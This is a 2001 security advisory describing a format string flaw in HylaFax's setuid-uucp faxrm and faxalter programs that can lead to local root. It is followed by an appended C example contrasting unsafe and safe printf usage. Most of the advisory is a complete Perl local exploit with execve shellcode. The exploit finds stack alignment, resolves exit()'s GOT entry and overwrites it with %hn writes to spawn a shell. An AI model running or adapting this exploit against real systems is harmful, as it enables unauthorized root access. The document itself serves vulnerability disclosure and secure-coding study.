HylaFax format string vulnerability

Published: 2001-10-16
Updated: 2001-10-16
Severity: High
Threat level: local administrator (root) privileges
Error type: input validation error
Attack vector: server
Affected systems: HylaFax Client version 4.1-5

Detailed description

The faxrm and faxalter programs in HylaFax are installed with UUCP privileges (setuid uucp) and contain a format string vulnerability. Because UUCP has programs that cron runs as UID 0, the flaw can lead to local root privileges.

Test code

#!/usr/bin/perl
# babcia padlina ltd.
# uid=uucp hylafax/freebsd (<= 4.1.b2) local exploit
# not intended to use by children under 18
# bug found by christer.oberg@gmx.net

$shellcode = "A" x 5000;
$shellcode .= "\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51";
$shellcode .= "\x52\x53\x53\x6a\x3b\x58\xcd\x80";

for($align=0;$align<4;$align++) {
    $fmt = "0" x $align . "ChujWDupeKomunie" . "%p" x 600;
    $out = `/usr/local/bin/faxrm -h $fmt 1 2>&1`;
    if ($out =~ /0x6a756843/) {
        $prematch = $`;
        $eat = 0;
        while($prematch =~ /0x/g) { $eat++; }
        last;
    } else {
        print "Not vulnerable\n";
        exit;
    }
}

$location = hex(`/usr/bin/objdump -R /usr/local/bin/faxrm | /usr/bin/grep " exit" | /usr/bin/cut -f1 -d " "`);
$value = 0xbfbfe704; # safe jump address, as we use huge padding

print "Align = $align\n";
print "Eat = $eat\n";
printf("exit() entry @ 0x%x\n", $location);
printf("Shellcode @ 0x%x\n", $value);

$big = $value & 0x0000ffff;
$small = ($value & 0xffff0000) >> 16;

if ($big < $small) {
    $big ^= $small; $small ^= $big; $big ^= $small;
    $dest_addr[0] = $location;
    $dest_addr[1] = $location + 2;
} else {
    $dest_addr[0] = $location + 2;
    $dest_addr[1] = $location;
}

$precision[0] = $small - (8 * $eat + 16 + $align);
$precision[1] = $big - $small;

$fmt = "0" x $align . "dupa" . pack('l', $dest_addr[0]) . "chuj" . pack('l', $dest_addr[1]) .
       "%.8x" x $eat . "%." . $precision[0] . "lx%hn" . "%." . $precision[1] . "lx%hn";

system('/usr/local/bin/faxrm', '-h', $fmt, $shellcode);

Solution

None yet.

Related information

venglin at freebsd.lublin.pl
dotslash at snosoft.com

Reference: http://www.securiteam.com/exploits/6C00B1F2UE.html
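The coding pattern behind this class of bug, beside its hardened form, as an added example that is not HylaFAX code: a printf-style message helper is handed an attacker-controlled hostname (the `-h` argument above) as the format itself instead of as data. The names `logmsg`, `report_host_unsafe` and `report_host_safe` are hypothetical, and the probe uses only `%%` so the demonstration stays well-defined.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for a fax client's message helper (not HylaFAX
 * code). Like syslog() or warn(), it takes a printf-style format. Giving it
 * __attribute__((format(printf, 3, 4))) would let -Wformat-security flag
 * the unsafe caller below at compile time. */
static int logmsg(char *out, size_t n, const char *fmt, ...) {
    va_list ap;
    va_start(ap, fmt);
    int len = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return len;
}

/* Vulnerable pattern: the untrusted hostname becomes the format string.
 * A "%%" is collapsed to "%"; a "%x" would read a nonexistent argument and
 * a "%n"/"%hn" would write through one, which is the primitive the
 * advisory's test code relies on. */
int report_host_unsafe(char *out, size_t n, const char *host) {
    return logmsg(out, n, host);
}

/* Hardened pattern: the format is a literal and the hostname is data. */
int report_host_safe(char *out, size_t n, const char *host) {
    return logmsg(out, n, "%s", host);
}

/* Returns 1 when the two paths render HOST differently, i.e. when the
 * unsafe path interpreted the untrusted string as a format. */
int host_is_interpreted(const char *host) {
    char a[128], b[128];
    report_host_unsafe(a, sizeof a, host);
    report_host_safe(b, sizeof b, host);
    return strcmp(a, b) != 0;
}

int main(void) {
    const char *probe = "fax%%host";   /* constructed sample input */
    printf("unsafe path interprets \"%s\": %d\n", probe,
           host_is_interpreted(probe));
    return 0;
}
```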